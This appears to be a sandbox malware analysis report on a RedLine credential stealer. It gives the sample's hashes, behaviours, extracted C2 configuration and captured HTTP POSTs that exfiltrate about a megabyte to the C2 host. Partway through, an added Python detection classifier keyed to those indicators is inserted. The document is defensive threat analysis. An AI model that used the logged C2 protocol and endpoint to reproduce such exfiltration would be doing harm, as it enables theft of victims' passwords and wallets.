Windows Analysis Report JEPayKhzWa

Overview

General Information

Sample Name: JEPayKhzWa (renamed file extension from none to exe)
Analysis ID: 452458
MD5: f471bf615ef92f5ee73b48fe203373de
SHA1: 11f0b6de8d4baf8e039f6244438ebb05bc589923
SHA256: d5608cba3115764a7758fa21c3e2f69724418dc48a8d0f5aaabe7efb71e2f28f
Tags: 32, exe, trojan
Detection

RedLine
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected RedLine Stealer
.NET source code contains very large strings
Injects a PE file into a foreign process
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Is looking for software installed on the system
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • JEPayKhzWa.exe (PID: 7024 cmdline: 'C:\Users\user\Desktop\JEPayKhzWa.exe' MD5: F471BF615EF92F5EE73B48FE203373DE)
    • conhost.exe (PID: 7040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • JEPayKhzWa.exe (PID: 7152 cmdline: C:\Users\user\Desktop\JEPayKhzWa.exe MD5: F471BF615EF92F5EE73B48FE203373DE)
    • JEPayKhzWa.exe (PID: 4680 cmdline: C:\Users\user\Desktop\JEPayKhzWa.exe MD5: F471BF615EF92F5EE73B48FE203373DE)
  • cleanup

Malware Configuration

Threatname: RedLine

{"C2 url": ["kurinogti.info:80"], "Bot Id": "MARA"}

Yara Overview

PCAP (Network Traffic)

Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_RedLine_1 | Yara detected RedLine Stealer | Joe Security |

Memory Dumps

Source | Rule | Description | Author | Strings
00000004.00000002.712342229.0000000000402000.00000040.00000001.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
00000000.00000002.657835482.00000000042E1000.00000004.00000001.sdmp | SUSP_Double_Base64_Encoded_Executable | Detects an executable that has been encoded with base64 twice | Florian Roth | 0x59ff8:$: VFZxUUFBT; 0x1275d0:$: VFZxUUFBT
00000000.00000002.657835482.00000000042E1000.00000004.00000001.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
Process Memory Space: JEPayKhzWa.exe PID: 4680 | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
Process Memory Space: JEPayKhzWa.exe PID: 4680 | JoeSecurity_RedLine_1 | Yara detected RedLine Stealer | Joe Security |
(3 more entries not shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
0.2.JEPayKhzWa.exe.44bdb88.1.raw.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
0.2.JEPayKhzWa.exe.44bdb88.1.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
0.2.JEPayKhzWa.exe.43f05b0.2.unpack | SUSP_Double_Base64_Encoded_Executable | Detects an executable that has been encoded with base64 twice | Florian Roth | 0x16420:$: VFZxUUFBT
0.2.JEPayKhzWa.exe.43f05b0.2.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
4.2.JEPayKhzWa.exe.400000.0.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
(2 more entries not shown)

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview


AV Detection:

Found malware configuration
Source: 0.2.JEPayKhzWa.exe.44bdb88.1.raw.unpack | Malware Configuration Extractor: RedLine {"C2 url": ["kurinogti.info:80"], "Bot Id": "MARA"}
Multi AV Scanner detection for domain / URL
Source: kurinogti.info | Virustotal: Detection: 8%
Source: http://kurinogti.info:80/ | Virustotal: Detection: 8%
Multi AV Scanner detection for submitted file
Source: JEPayKhzWa.exe | Virustotal: Detection: 60%
Source: JEPayKhzWa.exe | ReversingLabs: Detection: 62%
Source: JEPayKhzWa.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: JEPayKhzWa.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: text/xml; charset=utf-8 | SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings" | Host: kurinogti.info | Content-Length: 144 | Expect: 100-continue | Accept-Encoding: gzip, deflate | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: text/xml; charset=utf-8 | SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment" | Host: kurinogti.info | Content-Length: 1098077 | Expect: 100-continue | Accept-Encoding: gzip, deflate
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: text/xml; charset=utf-8 | SOAPAction: "http://tempuri.org/Endpoint/GetUpdates" | Host: kurinogti.info | Content-Length: 1098069 | Expect: 100-continue | Accept-Encoding: gzip, deflate | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 45.139.184.124
Source: Joe Sandbox View | ASN Name: HostingvpsvilleruRU
Source: JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmp | String found in binary or memory: l9https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
                    Source: JEPayKhzWa.exe, 00000004.00000002.713591036.0000000003240000.00000004.00000001.sdmpString found in binary or memory: romium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"*DivX Web Player*","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"*Facebook Video*","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"*Chrome PDF Viewer*","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"*Chrome PDF Plugin*","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"*Google Earth*","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"*Google Talk*","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely 
different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"*IBM*Java*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-j
Source: unknown | DNS traffic detected: queries for: kurinogti.info
Source: unknown | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: text/xml; charset=utf-8 | SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings" | Host: kurinogti.info | Content-Length: 144 | Expect: 100-continue | Accept-Encoding: gzip, deflate | Connection: Keep-Alive
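The extracted configuration and the captured SOAP POSTs above give a detection engineer three things to key on: the C2 host from the config, the WCF action names under http://tempuri.org/Endpoint/, and the absent User-Agent header that the "HTTP GET or POST without a user agent" signature fires on. The Python below is an added example, not part of the Joe Sandbox report and not RedLine's own code; it re-types two of the captured requests from this report with CRLF line endings (bodies omitted), adds two constructed requests for contrast (the host names www.example.com and 203.0.113.10 are invented), and runs a small classifier over all four.

```python
from __future__ import annotations

import json
import re
from dataclasses import dataclass

# Configuration exactly as the report's extractor printed it.
REDLINE_CONFIG = json.loads('{"C2 url": ["kurinogti.info:80"], "Bot Id": "MARA"}')

# WCF action names seen in this report's traffic and memory strings.
REDLINE_ACTIONS = {"EnvironmentSettings", "SetEnvironment", "GetUpdates", "VerifyUpdate"}
SOAP_ACTION_RE = re.compile(r'^"?http://tempuri\.org/Endpoint/(\w+)"?$')

# Constructed sample: the first two are the report's captured requests re-typed
# with CRLF line endings (bodies omitted); the last two are invented for contrast.
SAMPLE_REQUESTS = [
    "POST / HTTP/1.1\r\nContent-Type: text/xml; charset=utf-8\r\n"
    'SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"\r\n'
    "Host: kurinogti.info\r\nContent-Length: 144\r\nExpect: 100-continue\r\n"
    "Accept-Encoding: gzip, deflate\r\nConnection: Keep-Alive\r\n\r\n",
    "POST / HTTP/1.1\r\nContent-Type: text/xml; charset=utf-8\r\n"
    'SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"\r\n'
    "Host: kurinogti.info\r\nContent-Length: 1098077\r\nExpect: 100-continue\r\n"
    "Accept-Encoding: gzip, deflate\r\n\r\n",
    # Ordinary browser-style request to an unrelated host: must not fire.
    "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
    "User-Agent: Mozilla/5.0\r\nAccept: */*\r\n\r\n",
    # Same RedLine action, unknown host, User-Agent present: fires on the action only.
    "POST / HTTP/1.1\r\nContent-Type: text/xml; charset=utf-8\r\n"
    'SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"\r\n'
    "Host: 203.0.113.10:80\r\nUser-Agent: curl/8.0\r\nContent-Length: 1098069\r\n\r\n",
]


@dataclass
class HttpRequest:
    method: str
    path: str
    headers: dict[str, str]  # header names lower-cased


def parse_request(raw: str) -> HttpRequest:
    """Parse the request line and headers of a raw HTTP/1.1 request (body ignored)."""
    lines = raw.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers: dict[str, str] = {}
    for line in lines[1:]:
        if not line:  # blank line ends the header block
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, path, headers)


def c2_hosts(config: dict) -> set[str]:
    """Host names from the extracted 'C2 url' list, port stripped."""
    return {url.rsplit(":", 1)[0].lower() for url in config.get("C2 url", [])}


def classify(req: HttpRequest, config: dict) -> list[str]:
    """Return the reasons a request looks like RedLine C2 traffic (empty if none)."""
    reasons: list[str] = []
    host = req.headers.get("host", "").rsplit(":", 1)[0].lower()
    if host in c2_hosts(config):
        reasons.append(f"host {host} matches extracted C2")
    match = SOAP_ACTION_RE.match(req.headers.get("soapaction", ""))
    if match and match.group(1) in REDLINE_ACTIONS:
        reasons.append(f"RedLine SOAP action {match.group(1)}")
    if req.method in ("GET", "POST") and "user-agent" not in req.headers:
        reasons.append("no User-Agent header")
    return reasons


def scan(raw_requests: list[str], config: dict) -> list[tuple[int, list[str]]]:
    """Index and reasons for every request that triggers at least one check."""
    hits = []
    for i, raw in enumerate(raw_requests):
        reasons = classify(parse_request(raw), config)
        if reasons:
            hits.append((i, reasons))
    return hits


if __name__ == "__main__":
    for index, reasons in scan(SAMPLE_REQUESTS, REDLINE_CONFIG):
        print(f"request {index}: " + "; ".join(reasons))
```

Two caveats on weighting the reasons. tempuri.org is the namespace WCF assigns to any service contract that does not set one, so the prefix alone also matches in-house WCF clients; the action names are the discriminator, and the host match against the extracted config is the only reason that stands on its own. Many .NET HTTP clients also send no User-Agent, so that check is corroboration, not a verdict. The Content-Length of roughly 1 MB on the SetEnvironment and GetUpdates POSTs is what to look for in proxy logs: a megabyte uploaded over plain HTTP to a SOAP endpoint on a freshly registered host.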
Source: JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmp | String found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
Source: JEPayKhzWa.exe, 00000004.00000002.713518289.0000000003227000.00000004.00000001.sdmp | String found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
Source: JEPayKhzWa.exe, 00000004.00000002.713518289.0000000003227000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
Source: JEPayKhzWa.exe, 00000004.00000002.712813148.000000000151C000.00000004.00000020.sdmp | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
Source: JEPayKhzWa.exe, 00000004.00000002.713518289.0000000003227000.00000004.00000001.sdmp | String found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0L
Source: JEPayKhzWa.exe, 00000004.00000002.713591036.0000000003240000.00000004.00000001.sdmp, JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmp | String found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
Source: JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmp | String found in binary or memory: http://forms.rea
Source: JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmp | String found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
Source: JEPayKhzWa.exe, 00000004.00000002.713591036.0000000003240000.00000004.00000001.sdmp, JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmp | String found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
Source: JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmp | String found in binary or memory: http://go.micros
Source: JEPayKhzWa.exe, 00000004.00000002.713591036.0000000003240000.00000004.00000001.sdmp | String found in binary or memory: http://kurinogti.info
Source: JEPayKhzWa.exe, 00000004.00000002.713421106.00000000031B1000.00000004.00000001.sdmp | String found in binary or memory: http://kurinogti.info/
Source: JEPayKhzWa.exe, 00000004.00000002.713591036.0000000003240000.00000004.00000001.sdmp | String found in binary or memory: http://kurinogti.info46kt
Source: JEPayKhzWa.exe, 00000004.00000002.713421106.00000000031B1000.00000004.00000001.sdmp | String found in binary or memory: http://kurinogti.info:80/
Source: JEPayKhzWa.exe, 00000004.00000002.713518289.0000000003227000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: JEPayKhzWa.exe, 00000004.00000002.712813148.000000000151C000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.digicert.com0:
Source: JEPayKhzWa.exe, 00000004.00000002.713591036.0000000003240000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: JEPayKhzWa.exe, 00000004.00000002.713421106.00000000031B1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: JEPayKhzWa.exe, 00000004.00000002.713481969.00000000031FC000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: JEPayKhzWa.exe, 00000004.00000002.713481969.00000000031FC000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/D
Source: JEPayKhzWa.exe, 00000004.00000002.713421106.00000000031B1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: JEPayKhzWa.exe, 00000004.00000002.713421106.00000000031B1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
Source: JEPayKhzWa.exe, 00000004.00000002.713421106.00000000031B1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: JEPayKhzWa.exe, 00000004.00000002.713421106.00000000031B1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmp | String found in binary or memory: http://service.r
Source: JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmp | String found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/
Source: JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmp | String found in binary or memory: http://support.a
Source: JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmp | String found in binary or memory: http://support.apple.com/kb/HT203092
Source: JEPayKhzWa.exe, 00000004.00000002.713481969.00000000031FC000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/
Source: JEPayKhzWa.exe, 00000004.00000002.713421106.00000000031B1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/0
Source: JEPayKhzWa.exe, 00000004.00000002.713421106.00000000031B1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsP
Source: JEPayKhzWa.exe, 00000004.00000002.713421106.00000000031B1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
Source: JEPayKhzWa.exe, 00000004.00000002.713591036.0000000003240000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
Source: JEPayKhzWa.exe, 00000004.00000002.713421106.00000000031B1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
Source: JEPayKhzWa.exe, 00000004.00000002.713802431.000000000333F000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
Source: JEPayKhzWa.exe, 00000004.00000002.713421106.00000000031B1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
Source: JEPayKhzWa.exe, 00000004.00000002.713421106.00000000031B1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
Source: JEPayKhzWa.exe, 00000004.00000002.713421106.00000000031B1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
Source: JEPayKhzWa.exe, 00000004.00000002.713421106.00000000031B1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/ewP
Source: JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmp | String found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
Source: JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmp | String found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
Source: JEPayKhzWa.exe, 00000004.00000002.723399580.0000000008401000.00000004.00000001.sdmp, tmp47EE.tmp.4.dr | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: JEPayKhzWa.exe | String found in binary or memory: https://api.ip.sb/geoip
Source: JEPayKhzWa.exe, 00000000.00000002.657835482.00000000042E1000.00000004.00000001.sdmp, JEPayKhzWa.exe, 00000004.00000002.712342229.0000000000402000.00000040.00000001.sdmp | String found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
Source: JEPayKhzWa.exe, 00000004.00000002.713481969.00000000031FC000.00000004.00000001.sdmp | String found in binary or memory: https://api.ip.sb46k
Source: JEPayKhzWa.exe | String found in binary or memory: https://api.ipify.org
Source: JEPayKhzWa.exe, 00000000.00000002.657835482.00000000042E1000.00000004.00000001.sdmp, JEPayKhzWa.exe, 00000004.00000002.712342229.0000000000402000.00000040.00000001.sdmp | String found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
Source: JEPayKhzWa.exe, 00000004.00000002.723399580.0000000008401000.00000004.00000001.sdmp, tmp47EE.tmp.4.dr | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: JEPayKhzWa.exe, 00000004.00000002.723399580.0000000008401000.00000004.00000001.sdmp, tmp47EE.tmp.4.dr | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: JEPayKhzWa.exe, 00000004.00000002.723399580.0000000008401000.00000004.00000001.sdmp, tmp47EE.tmp.4.dr | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: JEPayKhzWa.exe, 00000004.00000002.723399580.0000000008401000.00000004.00000001.sdmp, tmp47EE.tmp.4.dr | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmp | String found in binary or memory: https://get.adob
Source: JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmp | String found in binary or memory: https://helpx.ad
Source: JEPayKhzWa.exe, JEPayKhzWa.exe, 00000004.00000002.712342229.0000000000402000.00000040.00000001.sdmp | String found in binary or memory: https://ipinfo.io/ip%appdata%
Source: JEPayKhzWa.exe, 00000004.00000002.713591036.0000000003240000.00000004.00000001.sdmp, JEPayKhzWa.exe, 00000004.00000002.713576583.000000000323C000.00000004.00000001.sdmp | String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: JEPayKhzWa.exe, 00000004.00000002.723399580.0000000008401000.00000004.00000001.sdmp, tmp47EE.tmp.4.dr | String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: JEPayKhzWa.exe, 00000004.00000002.723399580.0000000008401000.00000004.00000001.sdmp, tmp47EE.tmp.4.dr | String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: JEPayKhzWa.exe, 00000004.00000002.713591036.0000000003240000.00000004.00000001.sdmp, JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
Source: JEPayKhzWa.exe, 00000004.00000002.713591036.0000000003240000.00000004.00000001.sdmp, JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_java
Source: JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
Source: JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
Source: JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_real
Source: JEPayKhzWa.exe, 00000004.00000002.713591036.0000000003240000.00000004.00000001.sdmp, JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
Source: JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
Source: JEPayKhzWa.exe, 00000004.00000002.713591036.0000000003240000.00000004.00000001.sdmp, JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: JEPayKhzWa.exe, 00000004.00000002.713518289.0000000003227000.00000004.00000001.sdmp | String found in binary or memory: https://www.digicert.com/CPS0
Source: JEPayKhzWa.exe, 00000004.00000002.723399580.0000000008401000.00000004.00000001.sdmp, tmp47EE.tmp.4.dr | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

System Summary:

.NET source code contains very large strings
Source: JEPayKhzWa.exe, SystemServiceModelChannelsServiceChannelICallOnce94314.cs | Long String: Length: 174916
Source: 0.0.JEPayKhzWa.exe.f70000.0.unpack, SystemServiceModelChannelsServiceChannelICallOnce94314.cs | Long String: Length: 174916
Source: 0.2.JEPayKhzWa.exe.f70000.0.unpack, SystemServiceModelChannelsServiceChannelICallOnce94314.cs | Long String: Length: 174916
Source: 3.2.JEPayKhzWa.exe.2c0000.0.unpack, SystemServiceModelChannelsServiceChannelICallOnce94314.cs | Long String: Length: 174916
Source: 3.0.JEPayKhzWa.exe.2c0000.0.unpack, SystemServiceModelChannelsServiceChannelICallOnce94314.cs | Long String: Length: 174916
Source: 4.2.JEPayKhzWa.exe.ef0000.1.unpack, SystemServiceModelChannelsServiceChannelICallOnce94314.cs | Long String: Length: 174916
Source: 4.0.JEPayKhzWa.exe.ef0000.0.unpack, SystemServiceModelChannelsServiceChannelICallOnce94314.cs | Long String: Length: 174916
Source: C:\Users\user\Desktop\JEPayKhzWa.exe | Code function: 0_2_058519B8 NtUnmapViewOfSection
Source: C:\Users\user\Desktop\JEPayKhzWa.exe | Code function: 0_2_05851A70 NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\JEPayKhzWa.exe | Code function: 0_2_058519B3 NtUnmapViewOfSection
Source: C:\Users\user\Desktop\JEPayKhzWa.exe | Code function: 0_2_05851A68 NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\JEPayKhzWa.exe | Code function: 0_2_00F72050
Source: C:\Users\user\Desktop\JEPayKhzWa.exe | Code function: 0_2_032CB950
Source: C:\Users\user\Desktop\JEPayKhzWa.exe | Code function: 0_2_032CE260
Source: C:\Users\user\Desktop\JEPayKhzWa.exe | Code function: 0_2_032CE9EB
Source: C:\Users\user\Desktop\JEPayKhzWa.exe | Code function: 0_2_05850550
Source: C:\Users\user\Desktop\JEPayKhzWa.exe | Code function: 0_2_058F9048
Source: C:\Users\user\Desktop\JEPayKhzWa.exe | Code function: 0_2_058FA7D8
Source: C:\Users\user\Desktop\JEPayKhzWa.exe | Code function: 0_2_058F83D0
Source: C:\Users\user\Desktop\JEPayKhzWa.exe | Code function: 0_2_058FCB10
Source: C:\Users\user\Desktop\JEPayKhzWa.exe | Code function: 0_2_058FD278
Source: C:\Users\user\Desktop\JEPayKhzWa.exe | Code function: 0_2_058FBE70
Source: C:\Users\user\Desktop\JEPayKhzWa.exe | Code function: 3_2_002C2050
Source: C:\Users\user\Desktop\JEPayKhzWa.exe | Code function: 4_2_00EF2050
Source: C:\Users\user\Desktop\JEPayKhzWa.exe | Code function: 4_2_0305D448
Source: C:\Users\user\Desktop\JEPayKhzWa.exe | Code function: 4_2_0305CB50
Source: C:\Users\user\Desktop\JEPayKhzWa.exe | Code function: 4_2_05CDF3A0
Source: C:\Users\user\Desktop\JEPayKhzWa.exe | Code function: 4_2_05CDD100
Source: C:\Users\user\Desktop\JEPayKhzWa.exe | Code function: 4_2_05CDD0F1
Source: C:\Users\user\Desktop\JEPayKhzWa.exe | Code function: 4_2_05CD0040
Source: C:\Users\user\Desktop\JEPayKhzWa.exe | Code function: 4_2_05CD2840
Source: C:\Users\user\Desktop\JEPayKhzWa.exe | Code function: 4_2_05CD2831
Source: JEPayKhzWa.exe, 00000000.00000000.636379499.0000000000FCE000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameBantingism.exe4 vs JEPayKhzWa.exe
Source: JEPayKhzWa.exe, 00000000.00000002.657835482.00000000042E1000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameReunionist.exe4 vs JEPayKhzWa.exe
Source: JEPayKhzWa.exe, 00000003.00000000.642849049.000000000031E000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameBantingism.exe4 vs JEPayKhzWa.exe
Source: JEPayKhzWa.exe, 00000004.00000002.713591036.0000000003240000.00000004.00000001.sdmp | Binary or memory string: OriginalFilename vs JEPayKhzWa.exe
Source: JEPayKhzWa.exe, 00000004.00000002.712365192.000000000041A000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenameReunionist.exe4 vs JEPayKhzWa.exe
Source: JEPayKhzWa.exe, 00000004.00000002.712429776.0000000000F4E000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameBantingism.exe4 vs JEPayKhzWa.exe
Source: JEPayKhzWa.exe | Binary or memory string: OriginalFilenameBantingism.exe4 vs JEPayKhzWa.exe
Source: JEPayKhzWa.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
